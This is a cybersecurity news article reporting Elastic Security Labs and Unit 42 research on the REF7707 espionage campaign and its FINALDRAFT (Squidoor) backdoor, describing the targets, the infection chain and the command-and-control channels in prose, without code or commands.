Threat hunters have shed light on a new campaign targeting the foreign ministry of an unnamed South American nation with bespoke malware capable of granting remote access to infected hosts.
The activity, detected in November 2024, has been attributed by Elastic Security Labs to a threat cluster it tracks as REF7707. Some of the other targets include a telecommunications entity and a university, both located in Southeast Asia.
"While the REF7707 campaign is characterized by a well-engineered, highly capable, novel intrusion set, the campaign owners exhibited poor campaign management and inconsistent evasion practices," security researchers Andrew Pease and Seth Goodwin said in a technical analysis.
The exact initial access vector used in the attacks is currently not clear, although it has been observed that Microsoft's certutil application is used to download additional payloads from a web server associated with the Foreign Ministry.
The certutil commands used to retrieve the suspicious files have been found to be executed via the Windows Remote Management's Remote Shell plugin (WinrsHost.exe) from an unknown source system on a connected network.
"It indicates that attackers already possessed valid network credentials and were using them for lateral movement from a previously compromised host in the environment," the researchers noted.
The first of the files to be executed is a malware named PATHLOADER that allows for the execution of encrypted shellcode received from an external server. The extracted shellcode, dubbed FINALDRAFT, is subsequently injected into the memory of a newly-spawned "mspaint.exe" process.
Written in C++, FINALDRAFT is a full-featured remote administration tool that comes fitted with capabilities to execute additional modules on the fly and abuses the Outlook email service via the Microsoft Graph API for command-and-control (C2) purposes. It's worth noting that the abuse of the Graph API has been previously detected in another backdoor named SIESTAGRAPH.
The communication mechanism entails parsing the commands stored in the mailbox's drafts folder and writing the results of the execution into new draft emails for each command. FINALDRAFT registers 37 command handlers that are designed around process injection, file manipulation, and network proxy capabilities.
It's also engineered to start new processes with stolen NTLM hashes and execute PowerShell commands in a manner such that it does not invoke the "powershell.exe" binary. Instead, it patches several APIs to evade event tracing for Windows (ETW) and launches PowerPick, a legitimate utility that's part of the Empire post-exploitation toolkit.
ELF binary artifacts uploaded to VirusTotal from Brazil and the United States indicate the presence of a Linux variant of FINALDRAFT that features similar C2 functionality. The Linux version, for its part, can execute shell commands via popen and delete itself from the system.
"The completeness of the tools and the level of engineering involved suggest that the developers are well-organized," the researchers said. "The extended time frame of the operation and evidence from our telemetry suggest it's likely an espionage-oriented campaign."
Update
Palo Alto Networks Unit 42, which is tracking REF7707 under the moniker CL-STA-0049, said the suspected Chinese activity cluster has targeted governments, defense, telecommunication, education and aviation sectors in Southeast Asia and South America since at least March 2023.
"The observed activity includes collecting sensitive information from compromised organizations, as well as obtaining information about high-ranking officials and individuals at those organizations," security researchers Lior Rochberger and Tom Fakterman said.
The attack chains are known to weaponize vulnerabilities in Internet Information Services (IIS) servers to drop web shells, allowing the threat actors to remotely access and deploy a sophisticated backdoor dubbed FINALDRAFT (aka Squidoor) that's capable of infecting both Windows and Linux systems.
It's capable of maintaining access, lateral movement, creating covert communication channels with its operators, and harvesting information of interest from the targeted entities. It can also receive instructions to execute arbitrary commands, inject payloads into selected processes, exfiltrate files, enumerate running processes, and deliver additional payloads.
Squidoor is "engineered for an enhanced level of stealth," Unit 42 pointed out, adding its multi-platform implementations "enables the malware to infiltrate diverse network ecosystems, potentially compromising a broader range of targets and complicating detection and mitigation efforts across heterogeneous infrastructures."
A key aspect of the backdoor is its support for different methods for C2 communication, thereby making it possible for the adversaries to adapt to various scenarios and evade detection -
- HTTP-based communication
- Reverse TCP connection to a remote server
- Reverse UDP connection to a remote server
- Outlook mail API
- Domain Name System (DNS) tunneling
- Internet Control Message Protocol (ICMP) tunneling
- A mail client retrieved from the configuration file
- Named pipes-based communication (only internal and for Windows)
"After sending the initial beacon, Squidoor starts to query the email account for commands," the researchers said. "If such an email exists, Squidoor will retrieve its contents and delete it from the attacker's mailbox. This mechanism allows the malware to receive commands or additional malicious code from its C2 server disguised as innocent-looking Outlook network traffic."
(The story was updated after publication on February 28, 2025, to include additional insights about FINALDRAFT from Unit 42.)
